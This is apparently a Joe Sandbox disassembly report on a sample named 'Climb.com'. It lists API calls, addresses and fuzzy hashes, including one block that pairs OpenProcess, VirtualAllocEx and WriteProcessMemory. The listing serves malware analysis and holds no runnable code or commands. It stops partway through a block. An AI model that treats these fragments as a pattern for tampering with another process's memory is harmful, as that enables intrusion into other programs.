                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                          • Opcode ID: ad2a56bc61631b2dce0c79050afae3239da54cbbab817f49f30275ef8b985f97
                                                                                                                                                                          • Instruction ID: b8ef535b93143c9ac793513f930dcb8d2b878df8d50abd6a0c1ad77b0414c017
                                                                                                                                                                          • Opcode Fuzzy Hash: ad2a56bc61631b2dce0c79050afae3239da54cbbab817f49f30275ef8b985f97
                                                                                                                                                                          • Instruction Fuzzy Hash: ECF06D75200302ABDB224FE5DC4DF663BAEEF8A7A0F110524FA45D72A1CB70DC12CA60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AC1976
                                                                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1982
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1991
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1998
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC19AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                          • Opcode ID: 5b5542b793498ed018eb9579556bf3f7afd05206289d89525eaa90cb2cdbea9b
                                                                                                                                                                          • Instruction ID: 48b6b6b05775f7f25420ec27fd13b52b57c8be5020ec164b9873c195dcc49220
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b5542b793498ed018eb9579556bf3f7afd05206289d89525eaa90cb2cdbea9b
                                                                                                                                                                          • Instruction Fuzzy Hash: 8DF06275200301ABD7228FE4EC99F663B6EEF897A0F110514FA45C7251CB70D812CA60
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CCB
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CD8
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CE5
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CF2
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0CFF
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00AD0B24,?,00AD3D41,?,00000001,00AA3AF4,?), ref: 00AD0D0C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 309f2995b9a1e2cbcdaa5ee693791e114ef75a2539584103c16234f42a974989
                                                                                                                                                                          • Instruction ID: 8776ec9edc87c5b4668f7a87b304a5ce1d6f1f224ff749abded7c550b60787b2
                                                                                                                                                                          • Opcode Fuzzy Hash: 309f2995b9a1e2cbcdaa5ee693791e114ef75a2539584103c16234f42a974989
                                                                                                                                                                          • Instruction Fuzzy Hash: E801DC71800B058FCB30AFA6D880916FAF9BF602157108A3FD19352A21C7B0A858DE80
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00AC65BF
                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00AC65D6
                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 00AC65EE
                                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00AC660A
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00AC6624
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3741023627-0
                                                                                                                                                                          • Opcode ID: cc6f2d8b8686ff87f2ab31c62f55cd3d22b6a524d8d7683bdc3ef8dd11c65f21
                                                                                                                                                                          • Instruction ID: ab731832cac2ed8408ba0c62dc9c95b8258ca8466a3b67978c5dabbf92172d95
                                                                                                                                                                          • Opcode Fuzzy Hash: cc6f2d8b8686ff87f2ab31c62f55cd3d22b6a524d8d7683bdc3ef8dd11c65f21
                                                                                                                                                                          • Instruction Fuzzy Hash: 56018630500304ABEB259F90DE4EFA67B79FB04B05F01065DA187A10E1DBF4AA45CA51
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DAD2
                                                                                                                                                                            • Part of subcall function 00A92D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4), ref: 00A92D4E
                                                                                                                                                                            • Part of subcall function 00A92D38: GetLastError.KERNEL32(00B31DC4,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4,00B31DC4), ref: 00A92D60
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DAE4
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DAF6
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DB08
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DB1A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: bbfc255d310254408d2285111b80534342c1af6eb98e938f91af3869dec424cd
                                                                                                                                                                          • Instruction ID: cce89290c11e7b7139379a26aa3a45e9e806e88597d47d4c149088c2b7f02969
                                                                                                                                                                          • Opcode Fuzzy Hash: bbfc255d310254408d2285111b80534342c1af6eb98e938f91af3869dec424cd
                                                                                                                                                                          • Instruction Fuzzy Hash: 42F01732745204BB8E34EB68EA86E1A77EDEE047647A50C09F009DB901CF30FCC08BA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00A9262E
                                                                                                                                                                            • Part of subcall function 00A92D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4), ref: 00A92D4E
                                                                                                                                                                            • Part of subcall function 00A92D38: GetLastError.KERNEL32(00B31DC4,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4,00B31DC4), ref: 00A92D60
                                                                                                                                                                          • _free.LIBCMT ref: 00A92640
                                                                                                                                                                          • _free.LIBCMT ref: 00A92653
                                                                                                                                                                          • _free.LIBCMT ref: 00A92664
                                                                                                                                                                          • _free.LIBCMT ref: 00A92675
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: b87148fc4f11ef4bd2416e8db8421cbcdce71ff80456a37284fbc980216e07a1
                                                                                                                                                                          • Instruction ID: ee9becc59464846ea3ce6e07fd7d94eb027f28708633ca9d49f88676919072a8
                                                                                                                                                                          • Opcode Fuzzy Hash: b87148fc4f11ef4bd2416e8db8421cbcdce71ff80456a37284fbc980216e07a1
                                                                                                                                                                          • Instruction Fuzzy Hash: B3F09EB1A41520AB8F22EF5CFD01A4D3BE8FB247553650A4AF414D7275CF350A12AFD5
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __freea$_free
                                                                                                                                                                          • String ID: a/p$am/pm
                                                                                                                                                                          • API String ID: 3432400110-3206640213
                                                                                                                                                                          • Opcode ID: 0ca80e3df5ad8d83bc582467d7f435d061619108e435c7c57e58c4338180e217
                                                                                                                                                                          • Instruction ID: b65c6898d73dc5e1858048d1c2b2caa719e321c3ef44fcc88d87299c2195fd8b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ca80e3df5ad8d83bc582467d7f435d061619108e435c7c57e58c4338180e217
                                                                                                                                                                          • Instruction Fuzzy Hash: 73D11275F00207DADF259FA8C955BBAB7F1FF45300F29415AEA06AB290D7358D81CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00ACBDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC2B1D,?,?,00000034,00000800,?,00000034), ref: 00ACBDF4
                                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AC30AD
                                                                                                                                                                            • Part of subcall function 00ACBD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AC2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00ACBDBF
                                                                                                                                                                            • Part of subcall function 00ACBCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00ACBD1C
                                                                                                                                                                            • Part of subcall function 00ACBCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AC2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00ACBD2C
                                                                                                                                                                            • Part of subcall function 00ACBCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AC2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00ACBD42
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AC311A
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AC3167
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                                          • Opcode ID: 4518dc219cbf4f1943b755ba1b384e83ed9dca7b6fc07b97732a5a63a968ea95
                                                                                                                                                                          • Instruction ID: b9597250b521927bb05d7e83ec543a93ab7c3cf0341be0d72015b1a55ead7aa8
                                                                                                                                                                          • Opcode Fuzzy Hash: 4518dc219cbf4f1943b755ba1b384e83ed9dca7b6fc07b97732a5a63a968ea95
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C412B72900218BEDF11DBA4CD42FEEBBB8EF49300F018199EA45B7180DA716F45CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\768400\Climb.com,00000104), ref: 00A91AD9
                                                                                                                                                                          • _free.LIBCMT ref: 00A91BA4
                                                                                                                                                                          • _free.LIBCMT ref: 00A91BAE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                          • API String ID: 2506810119-1602658879
                                                                                                                                                                          • Opcode ID: c45c4ef55c86aa369ead2d26a8f11b01bbb529c14bc2c67afce9aa284872b6a7
                                                                                                                                                                          • Instruction ID: b63dcf1af29d95226eb33a4795cceb2b0cd7267c735c2f49a46b1975204feac6
                                                                                                                                                                          • Opcode Fuzzy Hash: c45c4ef55c86aa369ead2d26a8f11b01bbb529c14bc2c67afce9aa284872b6a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D317E71B40219BFDF21EF99DD85D9EBBFDEF85750B2041A6E80497221E6708E41CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ACCBB1
                                                                                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00ACCBF7
                                                                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B329C0,01093C30), ref: 00ACCC40
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 135850232-4108050209
                                                                                                                                                                          • Opcode ID: 1ebb8c27ddb1ff85fb10b6d35f174419bb65aaf4d4047e393fbf42782e28c0b1
                                                                                                                                                                          • Instruction ID: 0c7e52e240dca7f5860509aacf72e6c5a1ba8b3f33247ee15748a55bf9cd44ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ebb8c27ddb1ff85fb10b6d35f174419bb65aaf4d4047e393fbf42782e28c0b1
                                                                                                                                                                          • Instruction Fuzzy Hash: 4841E2312083029FD720DF24D984F6ABBE8EF84724F154A1DF4A997291DB30E904CB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AFDCD0,00000000,?,?,?,?), ref: 00AF4F48
                                                                                                                                                                          • GetWindowLongW.USER32 ref: 00AF4F65
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AF4F75
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                                          • Opcode ID: 724670f050119005479a89878a6eeb19b3669eb2b6ebc2440439d7e7f2631f0f
                                                                                                                                                                          • Instruction ID: 7715d570810d996767aa52195590d70ca7a28f6ff1339323e2df88e3eee2cc82
                                                                                                                                                                          • Opcode Fuzzy Hash: 724670f050119005479a89878a6eeb19b3669eb2b6ebc2440439d7e7f2631f0f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C318D31214609AFDB218FB8DC45BEB7BA9EB08338F244715FA79A31E0D770AC519B50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AE3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00AE3AD4,?,?), ref: 00AE3DD5
                                                                                                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AE3AD7
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AE3AF8
                                                                                                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00AE3B63
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                                          • API String ID: 946324512-2422070025
                                                                                                                                                                          • Opcode ID: 8dce5d23665de5bd2f27782a690e3eb5de2db947cf7895d96746f77319ae1d8a
                                                                                                                                                                          • Instruction ID: 44610b77012304e0da9a31c33e93139ee7b2f18c41b37b31b674c9ac2ff3fa10
                                                                                                                                                                          • Opcode Fuzzy Hash: 8dce5d23665de5bd2f27782a690e3eb5de2db947cf7895d96746f77319ae1d8a
                                                                                                                                                                          • Instruction Fuzzy Hash: E03190366002819FCB10DF6AC589A6977F1EF14324F248159E8178B392D771EE45CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AF49DC
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AF49F0
                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AF4A14
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window
                                                                                                                                                                          • String ID: SysMonthCal32
                                                                                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                                                                                          • Opcode ID: 4c6308e61a86d40dd6ea02cceddb07272741b21379320a99d71cdd4e92dac073
                                                                                                                                                                          • Instruction ID: 79e71facd936bbf7938716f4658cd9db3d141cb45157cfa4be65461c20a36a29
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c6308e61a86d40dd6ea02cceddb07272741b21379320a99d71cdd4e92dac073
                                                                                                                                                                          • Instruction Fuzzy Hash: AF21AD32610219ABDF129F94DC82FEF3B69EF48728F110214FB556B190D6B5A8519B90
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AF51A3
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AF51B1
                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AF51B8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
